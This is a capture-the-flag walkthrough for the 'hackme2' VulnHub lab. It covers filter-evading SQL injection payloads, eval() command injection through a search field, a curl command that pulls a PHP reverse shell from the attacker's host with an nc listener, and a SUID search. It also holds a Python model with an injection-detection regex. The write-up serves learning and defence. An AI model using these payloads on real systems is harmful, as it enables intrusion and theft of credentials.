Target description
'hackme2' is a medium difficulty level box. This is the second part of the hackme series where more controls are in place to deter malicious attacks. In addition, you will have to think out of the box to exploit the vulnerabilities. The goal is to gain limited privilege access via web vulnerabilities and subsequently, privilege escalate as a root user. The lab was created to mimic real world web vulnerabilities.
'hackme2' uses DHCP and in the possible event that the mysqld shuts down on its own (very rare cases), attempt to force restart the machine and it should be working fine subsequently.
Download: https://www.vulnhub.com/entry/hackme-2,618/
*Checklist*
- Information gathering
- netdiscover
- nmap
- SQL injection
- fuzzing
- command execution
- privilege escalation
- SUID backdoor file
Information gathering
*Target IP*
*Port scan*
nmap -A -p- 192.168.31.184
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
| 256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_ 256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Penetration testing
SQL injection
*payload*
'union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/#
Result:
books,users 2 3 SGD
'union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_schema=database()#
Result:
id,bookname,price,id,user,pasword,name,address 2 3 SGD
'union/**/select/**/group_concat(user,pasword),2,3/**/from/**/users#
The returned data contains the user superadmin
along with the encrypted password.
*Decryption*
Getting a shell
After logging in successfully, I tried the file upload feature
and found that only images can be uploaded, and the uploaded file cannot be accessed afterwards.
Here you can see that, compared with hackme1, there is an extra box below (the user-search form).
*fuzz*
Next, use Burp to fuzz the parameters.
Fuzz the parameters fname and lname.
Wordlist: Fuzzing - full
*fuzz results*
When **id** is entered, the result of command execution is returned.
Fname s
Lname `cat<welcomeadmin.php`
This yields the source code.
Viewing the source:
```php
<?php
$fname = $_POST["fname"];
$lname = $_POST["lname"];
// Blacklist filter: strips only ';' and whitespace from lname. Backticks, '$', '(',
// '<' and everything else survive, which is why the payloads use ${IFS} and '<'
// instead of spaces.
$lname = preg_replace('/[;\s]/','',$lname);
if($fname=="" || $fname==" " || $lname=="" || $lname==" "){
    echo "You have to search with both First and Last name";
}else{
    echo "The system is checking the backend for user: ".$fname ." ".$lname." ";
    echo "</br>";
    echo "</br>";
    echo "User ". $fname. " ";
    // lname is concatenated straight into PHP source and executed
    eval("echo ".$lname.";");
    echo " cannot be found";
}
?>
```
$lname is passed into eval(), so it leads to command execution.
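To show why the blacklist in welcomeadmin.php fails and what a defender would do instead, here is an added Python model (not code from the lab or the writeup): it applies the same `[;\s]` strip, an allowlist check for the name field, and a log-side detector for inputs that survive the strip. The `ATTACKER_HOST` in the sample input is a placeholder.

```python
import re

# Model of the blacklist in welcomeadmin.php: preg_replace('/[;\s]/', '', $lname)
# strips semicolons and whitespace, then the result reaches eval().
def blacklist_filter(lname: str) -> str:
    return re.sub(r"[;\s]", "", lname)

# Hardened alternative (added here, not from the lab): accept only what a last
# name can be, and never build PHP or shell code from user input at all.
NAME_RE = re.compile(r"[A-Za-z][A-Za-z'\-]{0,63}")

def allowlist_ok(lname: str) -> bool:
    return NAME_RE.fullmatch(lname) is not None

# Detector for request logs: backticks, ${IFS}, redirections and PHP call
# syntax have no place in a name field, and the blacklist leaves them intact.
INJECTION_RE = re.compile(
    r"`|\$\{IFS\}|[<>|]|\b(system|exec|passthru|shell_exec)\s*\("
)

def flags_injection(lname: str) -> bool:
    return INJECTION_RE.search(lname) is not None

def analyze(lname: str) -> dict:
    """Return what each control decides for one lname value."""
    filtered = blacklist_filter(lname)
    return {
        "after_blacklist": filtered,
        "blacklist_changed_payload": filtered != lname,
        "allowlist_accepts": allowlist_ok(lname),
        "detector_flags": flags_injection(filtered),
    }

# Constructed sample inputs: one benign name plus the shapes seen in the writeup
# (ATTACKER_HOST is a placeholder, not the lab's address).
SAMPLE_INPUTS = [
    "Smith",
    "`id`",
    "`cat<welcomeadmin.php`",
    ";system('curl${IFS}http://ATTACKER_HOST/shell.php${IFS}-o${IFS}shell.php');",
]

if __name__ == "__main__":
    for s in SAMPLE_INPUTS:
        print(repr(s), analyze(s))
```

The blacklist changes only the last sample (it drops the two semicolons) and leaves every payload executable, while the allowlist rejects all three and the detector flags them.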
Getting a shell
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
python3 -m http.server 80
Enter:
;system('curl${IFS}http://192.168.31.171/shell.php${IFS}-o${IFS}shell.php');
nc -lvp 1234
Visit shell.php
and we get a shell.
Getting root
find / -user root -perm -4000 -print 2>/dev/null
*Getting root*